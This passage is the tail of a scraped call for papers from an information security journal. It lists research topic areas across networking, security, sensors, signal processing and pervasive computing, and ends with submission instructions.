Security, Privacy Enhancing Technologies, Security Protocols (for Identification and Authentication,
Confidentiality and Privacy, and Integrity), Ubiquitous Networks: Ad Hoc Networks Security, Delay-Tolerant Network Security, Domestic Network Security, Peer-to-Peer Networks Security, Security Issues
in Mobile and Ubiquitous Networks, Security of GSM/GPRS/UMTS Systems, Sensor Networks Security,
Vehicular Network Security, Wireless Communication Security: Bluetooth, NFC, WiFi, WiMAX,
WiMedia, others
This Track will emphasize the design, implementation, management and applications of computer
communications, networks and services. Topics of mostly theoretical nature are also welcome, provided
there is clear practical potential in applying the results of such work.
Track B: Computer Science
Broadband wireless technologies: LTE, WiMAX, WiRAN, HSDPA, HSUPA, Resource allocation andinterference management, Quality of service and scheduling methods, Capacity planning and dimensioning,
Cross-layer design and Physical layer based issue, Interworking architecture and interoperability, Relay
assisted and cooperative communications, Location and provisioning and mobility management, Call
admission and flow/congestion control, Performance optimization, Channel capacity modeling and analysis,
Middleware Issues: Event-based, publish/subscribe, and message-oriented middleware, Reconfigurable,
adaptable, and reflective middleware approaches, Middleware solutions for reliability, fault tolerance, and
quality-of-service, Scalability of middleware, Context-aware middleware, Autonomic and self-managing
middleware, Evaluation techniques for middleware solutions, Formal methods and tools for designing,
verifying, and evaluating, middleware, Software engineering techniques for middleware, Service oriented
middleware, Agent-based middleware, Security middleware, Network Applications: Network-based
automation, Cloud applications, Ubiquitous and pervasive applications, Collaborative applications, RFID
and sensor network applications, Mobile applications, Smart home applications, Infrastructure monitoring
and control applications, Remote health monitoring, GPS and location-based applications, Networkedvehicles applications, Alert applications, Embeded Computer System, Advanced Control Systems, and
Intelligent Control : Advanced control and measurement, computer and microprocessor-based control,
signal processing, estimation and identification techniques, application specific IC’s, nonlinear and
adaptive control, optimal and robot control, intelligent control, evolutionary computing, and intelligent
systems, instrumentation subject to critical conditions, automotive, marine and aero-space control and all
other control applications, Intelligent Control System, Wiring/Wireless Sensor, Signal Control System.
Sensors, Actuators and Systems Integration : Intelligent sensors and actuators, multisensor fusion, sensor
array and multi-channel processing, micro/nano technology, microsensors and microactuators,
instrumentation electronics, MEMS and system integration, wireless sensor, Network Sensor, Hybrid
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 214/215
Sensor, Distributed Sensor Networks. Signal and Image Processing : Digital signal processing theory,
methods, DSP implementation, speech processing, image and multidimensional signal processing, Image
analysis and processing, Image and Multimedia applications, Real-time multimedia signal processing,
Computer vision, Emerging signal processing areas, Remote Sensing, Signal processing in education.
Industrial Informatics: Industrial applications of neural networks, fuzzy algorithms, Neuro-Fuzzy
application, bioInformatics, real-time computer control, real-time information systems, human-machine
interfaces, CAD/CAM/CAT/CIM, virtual reality, industrial communications, flexible manufacturing
systems, industrial automated process, Data Storage Management, Harddisk control, Supply Chain
Management, Logistics applications, Power plant automation, Drives automation. Information Technology,
Management of Information System : Management information systems, Information Management,
Nursing information management, Information System, Information Technology and their application, Data
retrieval, Data Base Management, Decision analysis methods, Information processing, Operations research,
E-Business, E-Commerce, E-Government, Computer Business, Security and risk management, Medical
imaging, Biotechnology, Bio-Medicine, Computer-based information systems in health care, Changing
Access to Patient Information, Healthcare Management Information Technology.
Communication/Computer Network, Transportation Application : On-board diagnostics, Active safety
systems, Communication systems, Wireless technology, Communication application, Navigation and
Guidance, Vision-based applications, Speech interface, Sensor fusion, Networking theory and technologies,
Transportation information, Autonomous vehicle, Vehicle application of affective computing, Advance
Computing technology and their application : Broadband and intelligent networks, Data Mining, Data
fusion, Computational intelligence, Information and data security, Information indexing and retrieval,Information processing, Information systems and applications, Internet applications and performances,
Knowledge based systems, Knowledge management, Software Engineering, Decision making, Mobile
networks and services, Network management and services, Neural Network, Fuzzy logics, Neuro-Fuzzy,
Expert approaches, Innovation Technology and Management : Innovation and product development,
Emerging advances in business and its applications, Creativity in Internet management and retailing, B2B
and B2C management, Electronic transceiver device for Retail Marketing Industries, Facilities planning
and management, Innovative pervasive computing applications, Programming paradigms for pervasive
systems, Software evolution and maintenance in pervasive systems, Middleware services and agent
technologies, Adaptive, autonomic and context-aware computing, Mobile/Wireless computing systems and
services in pervasive computing, Energy-efficient and green pervasive computing, Communication
architectures for pervasive computing, Ad hoc networks for pervasive communications, Pervasive
opportunistic communications and applications, Enabling technologies for pervasive systems (e.g., wireless
BAN, PAN), Positioning and tracking technologies, Sensors and RFID in pervasive systems, Multimodalsensing and context for pervasive applications, Pervasive sensing, perception and semantic interpretation,
Smart devices and intelligent environments, Trust, security and privacy issues in pervasive systems, User
interfaces and interaction models, Virtual immersive communications, Wearable computers, Standards and
interfaces for pervasive computing environments, Social and economic models for pervasive systems,
Active and Programmable Networks, Ad Hoc & Sensor Network, Congestion and/or Flow Control, Content
Distribution, Grid Networking, High-speed Network Architectures, Internet Services and Applications,
Optical Networks, Mobile and Wireless Networks, Network Modeling and Simulation, Multicast,
Multimedia Communications, Network Control and Management, Network Protocols, Network
Performance, Network Measurement, Peer to Peer and Overlay Networks, Quality of Service and Quality
of Experience, Ubiquitous Networks, Crosscutting Themes – Internet Technologies, Infrastructure,
Services and Applications; Open Source Tools, Open Models and Architectures; Security, Privacy and
Trust; Navigation Systems, Location Based Services; Social Networks and Online Communities; ICT
Convergence, Digital Economy and Digital Divide, Neural Networks, Pattern Recognition, ComputerVision, Advanced Computing Architectures and New Programming Models, Visualization and Virtual
Reality as Applied to Computational Science, Computer Architecture and Embedded Systems, Technology
in Education, Theoretical Computer Science, Computing Ethics, Computing Practices & Applications
Authors are invited to submit papers through e-mail ijcsiseditor@gmail.com. Submissions must be original
and should not have been published previously or be under consideration for publication while being
evaluated by IJCSIS. Before submission authors should carefully read over the journal's Author Guidelines,
which are located at http://sites.google.com/site/ijcsis/authors-notes .
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 215/215